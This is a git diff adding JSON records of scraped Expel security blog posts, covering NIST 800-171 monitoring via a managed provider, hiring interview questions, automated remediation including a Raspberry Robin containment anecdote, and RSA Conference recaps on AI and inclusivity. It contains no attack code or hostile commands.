Monitor organizational systems, including inbound and outbound communications traffic, to detect attacks and indicators of potential attacks 3.14.7 Identify unauthorized use of organizational systems The details of each section are different, but the overall gist of all of these requirements is the same; you need someone to monitor your systems to look for bad things, respond to the bad things and then report on the bad things. The challenge for many organizations is the \u201csomeone\u201d part. Identifying \u201cwho\u201d exactly is going to monitor, respond and report often leads to a bunch of dead ends. While it\u2019s possible to automate a few things with some scripts and shoot texts and emails to IT staff at all hours of the night, that\u2019s not really satisfying (or sustainable). From a compliance perspective, that kind of solution is riding the edge of auditor acceptability. Worse, if you stumble into a reportable incident and your client comes looking to see what happened, solutions like scripts and late-night emails aren\u2019t going to be satisfying to them either. They\u2019re going to wonder why nobody was looking. Closing your compliance gaps without building a SOC If you\u2019re at a professional services company that does government contracting, you\u2019ve made responsible investments in security technology and you\u2019re staring at the 24\u00d77 monitoring requirements in section three of NIST 800-171 wondering what to do, you\u2019re in good company. Building a security operations center (SOC) and hiring a bunch of SOC analysts is about as likely as getting a sole source contract to run every federal network at every agency. So what should you do to get compliant? \u201cBy offloading your security operations to an MSSP, you can address the operational needs of 800-171 relatively quickly.\u201d The most obvious place to look is at managed service providers. By offloading your security operations to an MSSP or a managed detection and response (MDR) provider, you can address the operational needs of NIST 800-171 relatively quickly. Nine times out of \u2026. nine it\u2019s generally easier to sign a service contract that it is to build your own SOC. But choosing a provider isn\u2019t always straightforward. Not all MSSPs and MDRs are created equal, and there are warning signs that an MSSP may not be right for you. However, while we\u2019re admittedly a little biased, we feel that Expel is a great fit for organizations that are trying to get operational support for their NIST 800-171 needs. Here\u2019s why. We use your existing security technology Unlike many other MSSPs and MDRs, we meet our customers where they are. We don\u2019t require you to use a specific endpoint product or a specific SIEM (or even have a SIEM in the first place). We use what you use. Expel supports a large number of security vendors already, and if you use a technology we don\u2019t yet support, let\u2019s chat and see if we can integrate with it. You\u2019ve made your investment in security technology. Let us help you realize more value from that investment. We provide answers, not alerts It\u2019s a little cliche, but it\u2019s really the words we live by here at Expel. When our analysts investigate something and notify you about an incident, it\u2019s actually something you can transact on. Put another way \u2026 won\u2019t have to do your own analysis to figure out if it\u2019s a \u201creal\u201d alert or determine what the impact might be. We do that for you. Further, we provide you with specific steps you need to take to remediate the issue. Really, you don\u2019t need to think much about your security operations unless we notify you. And when we notify you, you\u2019ll be well armed to deal with the issue at hand. Onboarding is wicked fast! Some MSSP\u2019s and MDRs require weeks to months to onboard new customers. There may even be a professional services team that shows up to \u201chelp\u201d the process. Here at Expel, we\u2019ve been focused on making onboarding as easy as possible from day one. We send you a VM, you install it, and then you provide API keys for your various security technologies. We take it from there. Onboarding with Expel is usually measured in hours, with our customers seeing tangible value within the first few days. If you feel like you have a compliance gap you need to close, we can help you close it as fast as you\u2019re willing to move. The price is straightforward pricing Life is too short to spend running around and around with a vendor about pricing. I\u2019ve sat through enough color team meetings and responded to enough RFP\u2019s to know how valuable time is (and how infuriating wasted time can be). Here at Expel, we\u2019ve made our pricing straightforward. No hidden costs, no last minute \u201coh, that\u2019ll be extra.\u201d We collect all the info we need up front to quickly give you the complete breakdown you need. That should make your procurement people happy, which in general makes everyone happy. We\u2019re happy to chat about NIST 800-171 compliance and our service offerings . We\u2019re security nerds like that." +} \ No newline at end of file diff --git a/recruit-for-team-dauntless.json b/recruit-for-team-dauntless.json new file mode 100644 index 0000000000000000000000000000000000000000..130c3de3f97e2a53721ba26cbeb00a3b666b1590 --- /dev/null +++ b/recruit-for-team-dauntless.json @@ -0,0 +1,6 @@ +{ + "title": "Recruit for team dauntless", + "url": "https://expel.com/blog/recruit-team-dauntless/", + "date": "Oct 25, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Recruit for team dauntless Talent \u00b7 3 MIN READ \u00b7 YANEK KORFF \u00b7 OCT 25, 2017 \u00b7 TAGS: Employee retention / Great place to work / Hiring / Management I was interviewing a not-very-experienced candidate recently. She\u2019d had a number of internships in a variety of technical disciplines, but this was her first full-time role. As I do with many entry-level candidates, I asked what\u2019s known as the \u201cwhat happens when\u2026\u201d question : Question 1 Imagine you\u2019re at your computer, you type \u201cwww.expel.io\u201d into your web browser and hit enter. Tell me, in as much technical detail as you can, what happens next for that page to load. It\u2019s a great assessment question. It\u2019s relatively hard to study for because, as an interviewer, you can keep asking more detailed questions to see where a candidate\u2019s technical depth bottoms out. The candidate can\u2019t really fully prepare for all the directions this conversation can go. This isn\u2019t a game of stump-the-candidate, but instead a way for an interviewer to assess both the breadth and depth of a candidate\u2019s technical knowledge in this area. Our candidate did okay. Her fluency jumping around the OSI reference model implied a pretty good understanding of the network encapsulation and decapsulation process. She hit a lot of the right keywords with respect to HTTP and DNS at layer 7. She covered the handshake aspects of TCP. She even drilled down a bit into layer 2 and was able to articulate how to effectively manage a collision domain. Where things went a little bit sideways was around DNS itself. Whether it was nerves or otherwise, she seemed to struggle separating what was happening in the routing of DNS requests from the contents of those requests and the records that would need to be returned to the DNS queries sent. Overall, the candidate did well given her experience. She demonstrated a sufficient depth of knowledge that implied she\u2019d be able to learn what comes next. After all, without a strong technical foundation, you can\u2019t \u201clearn security.\u201d Your knowledge of how things work at a fundamental level forms a sort of backbone or framework onto which you can attach new things you learn. What\u2019s more, the volume of new things you learn every day in a security role is so high, it\u2019s essential to find people who have a genuine thirst for this knowledge. Some might say candidates have to be really passionate about it . Question 2 Tell me about a time at work, or a project at school that\u2026 thinking back to it, you say to yourself, \u201cIf I could do that every day\u2026 it was so much fun, that would be amazing.\u201d What was this work or project? What made it so great? Turns out, in her most recent internship, our candidate ended up solving a problem that users were having with attachments in Office 365. The process of individually downloading attachments was so cumbersome, people had written their own macros that would automatically download attachments directly to their desktop. Needless to say, the security team wasn\u2019t excited about the proliferation of homegrown macros combined with auto-downloads. So, the candidate dove into this problem and built a centralized capability using PowerShell and .NET that provided a safe means of retrieving, scanning, and depositing these attachments in a company-managed file share that met both the security team\u2019s needs and the needs of their user base. Nice work! What\u2019s most interesting is the reason this was her favorite work experience. It\u2019s multi-faceted. Not only did she enjoy solving a real problem that impacted users, she\u2019d never worked with PowerShell or .NET before. Nor had she written anything to interact with Office 365. All in all, it was a tremendous learning experience. Deriving so much pleasure (remember, this was her FAVORITE work experience) from learning new stuff certainly implies the kind of fearlessness that \u201c Team Dauntless \u201d might imply. Still, let\u2019s ask one more question. Question 3 What prompted you to take on this project? Well\u2026 our candidate was hired into a security team that hadn\u2019t had an intern before. They were unprepared. It became quickly clear that there weren\u2019t any clear tasks for her to take on. So, in the absence of guidance she started talking to the members of the team about problems they were facing to get a better lay of the land in search of problems she thought she might be able to take on. As this particular problem emerged, she started brainstorming with members of the team how it might be solved. PowerShell arose early as a potential vector for a solution, so she taught herself over the course of a couple weeks. As more nuanced needs arose, she continued to seek guidance from more senior members of the team and, coupled with her own independent research, eventually arrived at the solution she finally rolled out. The textbook definition of dauntless is \u201cfearlessness and determination.\u201d I can\u2019t think of a story that better exemplifies these behaviors in a candidate and I\u2019m really looking forward to this particular candidate joining our team. When you\u2019re interviewing the next member of your security team \u2013 consider this question. Do they display the qualities of fearlessness and determination that will drive them to achieve great things in your organization? Look for this, and you won\u2019t be disappointed with the outcome. \u2014 This is the fourth part of a five part series on key areas of focus to improve security team retention.Read from the beginning, 5 ways to keep your security nerds happy , or continue to part five ." +} \ No newline at end of file diff --git a/remediation-should-be-automated-and-customized.json b/remediation-should-be-automated-and-customized.json new file mode 100644 index 0000000000000000000000000000000000000000..9af03ed0e74917878205f2170aa3903ae4a712ea --- /dev/null +++ b/remediation-should-be-automated-and-customized.json @@ -0,0 +1,6 @@ +{ + "title": "Remediation should be automated\u2014and customized", + "url": "https://expel.com/blog/remediation-should-be-automated-and-customized/", + "date": "Oct 13, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Remediation should be automated\u2014and customized Security operations \u00b7 3 MIN READ \u00b7 PETER SILBERMAN \u00b7 OCT 13, 2022 \u00b7 TAGS: MDR Here at Expel, we talk an awful lot about remediation, and with good reason: effective remediation of cybersecurity incidents is critical for our customers\u2019 business and our own. Getting to the fix quickly is fine, but when done properly, the organization realizes a host of additional benefits. Customer control During an active incident, remediation reduces an organization\u2019s risk, but customer control of that process is absolutely essential. It\u2019s also important to understand that remediation isn\u2019t \u201call-or-nothing.\u201d Many providers in the marketplace sell a cookie-cutter, full-remediation approach, but organizations should have the option to provide context specific to their business, technology, risk tolerance, policies, and general comfort level, allowing them to dictate when to remediate and when not to. (Any number of factors can contribute to that comfort zone, including internal policies, familiarity with the vendor, lingering aches and pains from bad past experiences\u2014we get it. For example, you don\u2019t want a third party to isolate hosts during an incident? That\u2019s fine. A good provider can still disable compromised user accounts without isolating hosts.) The platform itself should know the rules and preferences of the customer; this ensures consistency and scale and ensures security operation center (SOC) analysts don\u2019t have to pass around sticky-notes reminding them to remediate a certain way for customer A, but not customer B, for example. A security operations platform that\u2019s context-aware and customizable allows the client organization to: Reduce risk by allowing automated remediation steps the moment an issue is detected; Reduce fatigue and burnout (why wake a customer analyst at 2 am to disable an account when the system can do it for you?); and Keep customer analysts focused on more important work\u2013what does the business deem important? Automated remediation\u2019s breathtaking benefits In our Quarterly Threat Report for Q2 , we noted that the median time to complete a non-automated remediation action was two hours. When automated, the median time drops to seven minutes\u2014a 1640% improvement. Regardless of whether they opt for automated remediation, organizations should insist on comprehensive reporting that includes remediation steps as part of the investigative process. Vendors can (and should) always recommend remediation actions, even if that vendor isn\u2019t going to take the steps themselves. A deeper look at the numbers suggests the benefits of automated remediation may be even greater for the customer. In Q2 2022: We had 3,378 remediation actions (RA) that were manual. ~30% of incidents had more than one remediation action , compounding the time savings. Let\u2019s take a look at what autoremediation looks like in our Workbench environment. Here\u2019s what it looks like in Slack: Many actions can be automated, including (but not limited to) host containment, disabling a user account, removing suspicious emails, or blocking a known bad hash. Customers can also decide what resources Expel can remediate on their behalf. As mentioned above, this is far from a cookie-cutter approach. Raspberry Robin/Evil Corp incident: huge time savings Raspberry Robin, a widespread USB-based worm that acts as a loader for other malware, has significant similarities to the Dridex malware loader, meaning that it can be traced back to the sanctioned Russian ransomware group Evil Corp. (Source: DarkReading ) This past June a CrowdStrike alert hit our queue that related to msiexec launching with unusual arguments on a customer host. Our team identified this as activity consistent with the installation of a variant of the Raspberry Robin Worm malware family attributed to Evil Corp. Using CrowdStrike\u2019s APIs, it took our analysts 5.5 minutes to progress from the alert hitting the queue to containing the host and stopping the ransomware. When the stakes are high, there\u2019s no time to waste in remediating. Autoremediation: it\u2019s your call Automated remediation should be tailored to your organization and based on the frequency of threats seen in your environment. The customer decides which users and endpoints should be immediately taken offline after a compromise is confirmed. This allows the security team to focus on other initiatives instead of spending a ton of time on remediation. As businesses think about managed detection and response (MDR) and reducing risk, considering offloading some of this costly work to a trusted provider is hopefully front-of-mind. It\u2019s also useful to understand the unique context of the organization, which includes business goals, existing technology, even corporate culture, and to talk with your provider about it. Want to learn more about Expel\u2019s approach to automated remediation? You can read more about it here ." +} \ No newline at end of file diff --git a/rsa-conference-day-2-inclusivity-is-the-goal.json b/rsa-conference-day-2-inclusivity-is-the-goal.json new file mode 100644 index 0000000000000000000000000000000000000000..8aa8be489aba025cab1dbf4212dbbe3e057609d2 --- /dev/null +++ b/rsa-conference-day-2-inclusivity-is-the-goal.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference Day 2: Inclusivity is the Goal", + "url": "https://expel.com/blog/rsa-conference-day-2-inclusivity-is-the-goal/", + "date": "Jun 8, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference Day 2: Inclusivity is the Goal Expel insider \u00b7 2 MIN READ \u00b7 ANDY RODGER \u00b7 JUN 8, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools Day two of RSA Conference is now in the rearview. We heard about nations around the world that present significant cyber threats and learned how the security operations center (SOC) is moving to be more autonomous. We also got some clarity on a few hot-button topics, like cryptocurrency, non-fungible tokens (NFTs), quantum computing, machine learning (ML), and artificial intelligence (AI) from the esteemed participants of the Cryptographers\u2019 Panel. But one session was particularly notable for Expletives and our customers alike, and that was Innovation, Ingenuity, and Inclusivity: The Future of Security is Now , presented by Vasu Jakkal, Corporate Vice President for Microsoft Security, Compliance, Identity Management and Privacy. In cybersecurity, we try to balance our time between considering the threats and attack strategies most likely to impact us today, while also looking ahead to the potential attacks of the future. Jakkal\u2019s perspective is that the threats of tomorrow exist today; they\u2019ll simply be more pervasive tomorrow. To stay ahead of this evolution, the industry\u2019s collective approach must also evolve. How? Through technological innovation, human ingenuity and expertise, and\u2014arguably most importantly\u2014inclusivity in our defender community. It\u2019s no secret that the cybersecurity industry struggles with attracting and retaining talent. Jakkal shared a few statistics: 1 in 3 security jobs in the US is vacant 24% of the global cybersecurity workforce is made up of women 20% of the global cybersecurity workforce is made up of people of color One way to overcome this challenge, Jakkal argues, is to create a more inclusive environment where people from many different backgrounds are empowered to do their best work and thrive. This is a sentiment we echo at Expel. We know we\u2019re \u201cbetter when different.\u201d We\u2019re a stronger organization when we recognize, celebrate, and learn from those whose backgrounds and perspectives are different from our own. We\u2019re committed to creating a safe place where any form of racism and discrimination is addressed and dismantled so everyone is treated with kindness and equality. This is rooted in our core belief that if we take care of our crew, they\u2019ll take care of our customers. We\u2019re on a journey to hire and develop people from underrepresented groups \u2014 Women, Black, Latinx, Indigenous, Multiracial, LGBTQ+, People with Disabilities, and Veterans \u2014 and to create a company that\u2019s as diverse as the countries in which we work and live. (By the way, we\u2019re hiring .) Jakkal offered up some of her own ideas for breaking down the barriers of entry to the defender community (and we couldn\u2019t agree with these more): Eliminate college degree and length of experience requirements for defenders Mobilize community colleges to help grow and diversify our workforce Change the language of cybersecurity to be about optimism and hope, rather than fear, uncertainty, and doubt (FUD) Throughout her session, Jakkal presented a number of great ideas and concepts that we feel all cybersecurity organizations should research and implement. But there was one line she said in passing that was, to us, the most important takeaway for the audience: Cybersecurity is for everyone. It\u2019s a simple phrase, but a powerful one. If you\u2019d like to learn more about how Expel practices equity, diversity, and inclusion on a day-to-day basis, visit this page ." +} \ No newline at end of file diff --git a/rsa-conference-day-2-recap-generative-ai-emerges-as.json b/rsa-conference-day-2-recap-generative-ai-emerges-as.json new file mode 100644 index 0000000000000000000000000000000000000000..21c513ae056773f0b12c98b2ffa4b0857d641889 --- /dev/null +++ b/rsa-conference-day-2-recap-generative-ai-emerges-as.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference day 2 recap: generative AI emerges as ...", + "url": "https://expel.com/blog/rsa-conference-day-2-recap-generative-ai-emerges-as-the-events-unofficial-theme/", + "date": "Apr 26, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference day 2 recap: generative AI emerges as the event\u2019s unofficial theme Expel insider \u00b7 2 MIN READ \u00b7 ANDY RODGER \u00b7 APR 26, 2023 \u00b7 TAGS: Company news \u201cStronger Together\u201d may be the official theme of RSA Conference 2023, but generative artificial intelligence (AI) has officially emerged as the unofficial theme this year. Conference sessions from keynotes to breakouts alike all seem to include some reference to generative AI (specifically ChatGPT) and the impact it could have on cybersecurity. While some talks showcase the forms it could take\u2013like how RSA CEO Rohit Ghai introduced a generative AI during his keynote and asked it what a unified identity platform should include, or Trellix CEO Brian Palma kicking off his presentation with a deepfake doppelganger demanding a ransom speaking fee to appear live\u2013other talks examined how AI is a two-sided coin. One side shows the havoc AI could wreak, and the other takes a more hopeful tone, focusing on how defenders can wield it for good. In the panel, Who Says Cybersecurity Can\u2019t Be Creative? , Daniel Trauner of Axonius regularly uses AI to get insights about the audiences his content will reach so he can better tailor his content and messages. In the same session, Chris Cochran of Hacker Valley Media said he uses ChatGPT to simplify complex topics for his podcast and web series audiences. Despite generative AI staking a claim for the unofficial theme of RSA Conference 2023, Vasu Jakkal of Microsoft Security masterfully combined the AI topic with the \u201cStronger Together\u201d ethos in her presentation, Defending at Machine Speed: Technology\u2019s New Frontier . (Eagle-eyed readers may remember that we highlighted one of Jakkal\u2019s presentations in our RSA Conference recaps in 2022, found here .) Like many other speakers, she argued that in cybersecurity, the concern shouldn\u2019t be about what technology can do but rather what people can accomplish when they harness technology. Jakkal provided the crowd with a brief history lesson on industrial revolutions, starting with the invention of the steam engine in 1750 and culminating in the AI revolution that started in 2022\u2014and has accelerated since. Jakkal argued that this acceleration means 2023 represents an inflection point for AI, but achieving security-specific AI requires the combination of AI, hyperscale data, and threat intelligence. The resulting security-specific AI models will tilt the scale in favor of defenders. But how? First, it will simplify the art and science of defending. AI will handle a lot of the repetitive, manual tasks often assigned to \u200clevel 1 security operations center (SOC) analysts. Frankly, this was refreshing to hear. Not only is it good news for SOC teams, but it\u2019s also something we at Expel have been saying for some time (and doing with our friendly detection and response bots, Josie\u2122 and Ruxie\u2122). Our founders started Expel with the goal of solving people challenges with a technology-forward approach. Next, AI will shape a new paradigm of productivity. It will help usher in new generations of talent into the cybersecurity workforce, and it will help guide people on their learning paths, allowing them to uplevel their skills. This could provide much-needed relief for the well-known cybersecurity talent gap. Finally, and perhaps most importantly, AI has the potential to break barriers for diversity and inclusion in security. When applied correctly, it provides equity and gives everyone\u2013regardless of their differences\u2013the same access to information to help them do their jobs effectively. Jakkal cautions, however, that this doesn\u2019t happen by accident. If AI is exposed to only certain sources of information, it will incorporate unconscious bias into its answers. So the cybersecurity community must make a real effort to encourage diverse use of the tool. She encouraged everyone to engage and prompt these large language models (LLMs) to ensure the community feeds it a diversity of thoughts and experiences. Jakkal ended her presentation pointing out that AI has the potential to be the most consequential technology of our lifetimes, but it will need all of us to make it stronger, together." +} \ No newline at end of file diff --git a/rsa-conference-day-3-impressions-from-the-show-floor.json b/rsa-conference-day-3-impressions-from-the-show-floor.json new file mode 100644 index 0000000000000000000000000000000000000000..9089f781673e4384442f1071588bfc4f9404cdb7 --- /dev/null +++ b/rsa-conference-day-3-impressions-from-the-show-floor.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference Day 3: Impressions From the Show Floor", + "url": "https://expel.com/blog/rsa-conference-day-3-impressions-from-the-show-floor/", + "date": "Jun 9, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference Day 3: Impressions From the Show Floor Expel insider \u00b7 3 MIN READ \u00b7 ANDY RODGER \u00b7 JUN 9, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools As the largest cybersecurity event in the world, RSA Conference serves up an agenda that provides something for everyone. No matter what cybersecurity area an attendee is interested in, there\u2019s likely to be a keynote or session that addresses it, as well as at least a handful of vendors competing in that area. The wide range of topics covered at a show like RSA Conference makes it nearly impossible for a single theme to rise above the rest and be the talk of the show. So we talked to a few folks who\u2019ve spent time on the show floor about the things they\u2019ve found most interesting, and the trends they\u2019re paying the most attention to at this year\u2019s conference. Here\u2019s what they had to say: What\u2019s the most interesting thing you\u2019ve noticed from the show floor? The main thing is that the human connection is more apparent and more visceral than I was expecting. I\u2019ve been coming to RSA Conference for a while, and normally it\u2019s the standard thing: you\u2019re an agent of the company, talking to another person who\u2019s an agent of the company, and there\u2019s a lot of \u2018synergies being leveraged\u2019 and corporate speak, and everyone\u2019s wearing a blazer\u2026 That\u2019s kind of hollow. But then you go away for a few years and realize you actually miss these people and the human connection comes back. I\u2019m seeing old friends, and it puts a whole different spin on what\u2019s going on here \u2014 which is super cool. \u2013 Matt Peters, Chief Product Officer of Expel I\u2019m happy to be back in person because of how small and tight-knit the security industry is. It\u2019s fun seeing everyone again. \u2013 Chris Dobrec, Vice President of Solutions for Armis ( a partner of Expel ) To be honest, the number of participants. I was a bit skeptical of the turn-out and I\u2019m pleasantly surprised that I was completely wrong about it. And more importantly, the folks that are showing up \u2014 even though the numbers are not as high as they\u2019ve been in the past \u2014 are coming in with very specific questions and interests. So the quantity may not be there, but the quality is. \u2013 Oscar Miranda, Field Chief Technology Officer of Healthcare for Armis One thing that stands out is the size of this conference. It\u2019s very obvious that this is a booming space, and there\u2019s so much opportunity for companies to do well in niche markets. Whether it\u2019s one specific supply chain area or workload protection, whatever, there\u2019s something for everybody here. \u2013 Adam Mikula, Sales Development Team Lead for Aqua Security What\u2019s a trend you find most compelling from this year\u2019s conference? I think that the XDR [extended detection and response] trend is compelling\u2026 Not because XDR\u2019s a new thing, but I think everyone is waking up to a fundamental concept about the way that security works. When they\u2019re talking about XDR, people are talking about the ability to do high-quality response \u2014 stitching together a whole bunch of things and actually empowering people to do high-quality investigations. As long as the vendors don\u2019t grab that and change it to suit their own purposes, I think the result will be improved security technology. \u2013 Matt Peters From a technology perspective, [I\u2019m seeing] the emphasis on risk, the emphasis on threat detection and response, different categories starting to come together \u2014 like XDR coming together as an amalgamation of endpoint security and SIEM, and a whole variety of things, to be a wholesale offering. That\u2019s starting to deliver on the promise (so-to-speak) that we\u2019ve been talking about with XDR for a long time. \u2013 Chris Dobrec There\u2019s a lot of consolidation, starting with overlap. A lot of these vendors \u2014 no matter what particular area within cybersecurity they\u2019ve traditionally been focused on \u2014 have expanded their functionality, which I predict is going to result in more consolidation amongst vendors and platforms. So, functionality that you would normally see in one type of technology, now you\u2019re going to see it across others. \u2013 Oscar Miranda Supply chain and shifting even further left has been a pretty consistent message. Attackers are getting smarter and code is getting even more complicated. You want to figure it out early, secure it early, and prevent it early, so you don\u2019t have problems later on. \u2013 Adam Mikula From these conversations, it sounds like XDR is now a part of the vernacular that isn\u2019t going away \u2014 it\u2019s time to get comfortable with what it means for both individual organizations, and the industry as a whole. Another undeniable theme? People are happy to be back in person, swapping stories and lessons learned with friends; old and new. We still have some fun planned as we head into the home stretch of the conference. Stop by our booth (S649) for pics with our friendly bots, Josie\u2122 and Ruxie\u2122, and load up on swag (if you still have room); we\u2019ll see you there ." +} \ No newline at end of file diff --git a/rsa-conference-day-3-recap-we-re-solving-people-problems.json b/rsa-conference-day-3-recap-we-re-solving-people-problems.json new file mode 100644 index 0000000000000000000000000000000000000000..5f830bd9529cc4464363fcb61c1794555d29cbcb --- /dev/null +++ b/rsa-conference-day-3-recap-we-re-solving-people-problems.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference day 3 recap: we're solving people problems", + "url": "https://expel.com/blog/rsa-conference-day-3-recap-were-solving-people-problems/", + "date": "Apr 27, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference day 3 recap: we\u2019re solving people problems Expel insider \u00b7 2 MIN READ \u00b7 ANDY RODGER \u00b7 APR 27, 2023 \u00b7 TAGS: Company news Whether RSA Conference 2023 attendees know it or not, we\u2019ve come together this week to solve people problems. It\u2019s easy to think of cyber criminals as a faceless, nebulous mass, but in reality they\u2019re just people using technology for nefarious means. The millions of open cybersecurity positions signal recruiting shortcomings and lack of clarity for people who might be interested in security careers. Artificial intelligence (AI) is on everyone\u2019s mind, but even that conversation focuses on how generative AI brings people closer to technology than previously imaginable. At the core, these are people problems. No matter the session topics or the booth messaging, many RSA attendees aim to arm defenders with the resources they need to protect their orgs and customers from cyberthreats. But what are those resources? The first answer that comes to mind might be new tools, or more advanced technology, but the right answer is teamwork. No matter what technology we use, we can\u2019t protect our organizations alone. It takes a village. Many sessions throughout this year\u2019s program focused on exactly this. When the CISOs of the NBA, NHL, and NFL joined a panel to discuss how they protect major sports leagues and high-profile athletes, they emphasized how they collaborate and share their challenges, best practices, lessons learned, and actual security intelligence. According to Ahmed Al Hammadi of the National Cybersecurity Agency in Qatar, securing the 2022 FIFA World Cup\u2014the largest sporting event in the world\u2014was only possible through close collaboration between the Qatari government, cybersecurity and technology consultants, vendors, and other subject matter experts. He emphasized the importance of public-private partnerships to defend against cyber attacks related to these events, and, in the same vein, he committed to working closely with the 2026 event organizers when it\u2019s held in North America. In their outstanding session, Strengthening Cybersecurity Through Inclusion , Camille Stewart Gloster of the White House Office of the National Cyber Director and Rob Duhart, Jr. of Walmart, talked about how security teams need to comprise diverse voices and backgrounds. They noted, \u201cdiversity is a deterrent,\u201d and \u201cwe underestimate the adversary when we build homogenous teams.\u201d Even the sessions that weren\u2019t all about security stressed the importance of community and collaboration. Eric Idle of Monty Python fame\u2014after admitting that he knows nothing about security\u2014noted that the five members of the troupe wrote every word for their shows, movies, albums, and more. He said that while the different members would go off and write in small groups, they\u2019d come together to present their ideas to the whole group, and if everyone laughed, they used it. He even talked about how George Harrison of The Beatles financed the production of Monty Python\u2019s The Life of Brian after initial funding was pulled. Harrison mortgaged his home for the cash needed to make the movie. Sometimes, even Monty Python needs a little help from their friends. (Sidebar: when Idle asked Harrison why he wanted to pay for the production, Harrison simply told him that he wanted to see the movie.) We all need the support of the community if we\u2019re going to win this cybersecurity battle. We can solve the shortage of cybersecurity talent, figure out the best ways to apply generative AI, and build diverse teams better equipped to fight the good fight. But there\u2019s only one way forward to solve the most important challenges facing our industry, and that\u2019s together." +} \ No newline at end of file diff --git a/rsa-conference-keynote-kickoff-what-it-means-to-be.json b/rsa-conference-keynote-kickoff-what-it-means-to-be.json new file mode 100644 index 0000000000000000000000000000000000000000..31b54ce82aafa0b9b3989d64a9c5e57f1d05b80a --- /dev/null +++ b/rsa-conference-keynote-kickoff-what-it-means-to-be.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference keynote kickoff: what it means to be \u201c ...", + "url": "https://expel.com/blog/rsa-conference-keynote-kickoff-what-it-means-to-be-stronger-together/", + "date": "Apr 25, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference keynote kickoff: what it means to be \u201cStronger Together\u201d Expel insider \u00b7 2 MIN READ \u00b7 ANDY RODGER \u00b7 APR 25, 2023 \u00b7 TAGS: Company news Perhaps more than any other industry, the world of cybersecurity requires community . Much ink (real and digital) has been spilled on this notion since the dawn of the space, as companies and individuals realized early on they\u2019d need to take special care to protect their vital assets in the cyber realm. Fighting cybercriminals takes everyone\u2013defenders, leaders, vendors, partners, competitors, frenemies, rivals, and, well, everybody \u2013coming together to combat those that mean us harm, whether it\u2019s for financial gain, IP theft, espionage, sowing chaos, or just for mischief. This community convenes this week in San Francisco for RSA Conference 2023 , and it\u2019s events like these that demonstrate the strength of this community. It\u2019s here that we share what we\u2019ve learned about the trends, technologies, and techniques that had the greatest impact in the previous year, as well as what\u2019s poised to affect us most in the year ahead. The \u201cStronger Together\u201d theme of this year\u2019s conference is front-and-center. But the mission runs much deeper than the signs around the Moscone Center and the slide decks on stage\u2014it\u2019s evident in the programming, too. The agenda features a wide range of technical sessions\u2014of course\u2014but it also features sessions on diversity and growing the cybersecurity workforce, both in size and experience. It includes the latest on perennial favorites like hacking tactics and incident response, as well as emerging ones, like the potential impact of artificial intelligence (AI) for criminals and defenders alike. So when the lights dimmed and the music started to introduce the keynote, it wasn\u2019t surprising to hear a voiceover reminding us that, \u201cWe are more than an industry. We are a community. No matter where you are in the world, we\u2019re always here to welcome you home.\u201d This theme was also reflected in the opening to the keynote, delivered by Saturday Night Live legend and Portlandia star, Fred Armisen. He got the crowd laughing and heads bopping with his take on guitar music genres and lyrical styles from the \u201960s through the early 2000s. But when he got the crowd to its feet to sing along to \u201cAll You Need Is Love\u201d by The Beatles, the idea of being \u201cstronger together\u201d really started to coalesce. Following Fred Armisen is no easy feat, but RSA Conference program committee chair Hugh Thompson delivered. He reminded the crowd that this event is about the fellowship among others that face the same challenges, and we\u2019re all here to build bridges and connections. He reminded us that when we chose a career in cybersecurity, we also committed to being life-long learners. Our adversaries are just as creative, smart, and well-resourced as we are, so we must constantly learn to stay ahead. This challenge is particularly important in the field of science and technology. Thompson very aptly noted that when advancements emerge, they shine a bright light. This light represents an opportunity, but it also casts a shadow in which our adversaries operate. But that\u2019s okay. We\u2019re shadow experts. We know where to look, where to shine more light, and how to expose attackers and their tactics. Thompson only held the stage for a few brief minutes, but his message was clear: we\u2019re a community, and together we\u2019ll emerge victorious. If you\u2019re interested in learning about Expel\u2019s role in the cybersecurity community, visit us in the South Hall of the Moscone Center, booth 0954. And be sure to follow us on LinkedIn and Twitter , where we\u2019re posting frequent updates about our booth happenings and what we\u2019re hearing in sessions." +} \ No newline at end of file diff --git a/rsa-conference-returns-day-1-keynote-summary.json b/rsa-conference-returns-day-1-keynote-summary.json new file mode 100644 index 0000000000000000000000000000000000000000..160d0e7f746ef51adc747f6941211b2ebc6bbed7 --- /dev/null +++ b/rsa-conference-returns-day-1-keynote-summary.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference Returns: Day 1 Keynote Summary", + "url": "https://expel.com/blog/rsa-conference-returns-day-1-keynote-summary/", + "date": "Jun 7, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference Returns: Day 1 Keynote Summary Expel insider \u00b7 3 MIN READ \u00b7 ANDY RODGER \u00b7 JUN 7, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools The moment we\u2019ve been waiting for is here! RSA Conference is back, live and in-person. While you can correctly point out that the conference never really went away\u2014it was a virtual event in 2021\u2014many folks in our industry would agree that it just wasn\u2019t the same. Albeit with smaller crowds than pre-pandemic years and four months later than originally scheduled, it\u2019s great to be back and the energy is high. RSA picked \u201cTransform\u201d as its theme for this year\u2019s event. It\u2019s rather apropos considering the state of our industry, our workforce, security technologies, the threat landscape, and the very nature of this event. It seems that every year represents a \u201cturning point\u201d for the world of cybersecurity, and 2022 is no different. The keynote speakers who kicked off the 2022 event were all inspiring and hopeful for the future of the security space. But before they came out, the crowd was treated to a special performance\u2026 You know something special is about to happen when a beatboxer kicks off a conference. And when that beatboxer is followed by the rest of her group, Freestyle Love Supreme , the energy gets amped way up! Side bar: If you missed out on the keynote (or you just can\u2019t get enough), we\u2019re hosting freestyle rapper and YouTube sensation, Harry Mack , at our booth (S649) on Tuesday, June 7, at 11 am, 2 pm, and 5 pm PT. (Great minds think alike, @RSAC!) Rohit Ghai, the CEO of RSA, bravely took the stage following the special act for the opening keynote. His address, titled, \u201cThe Only 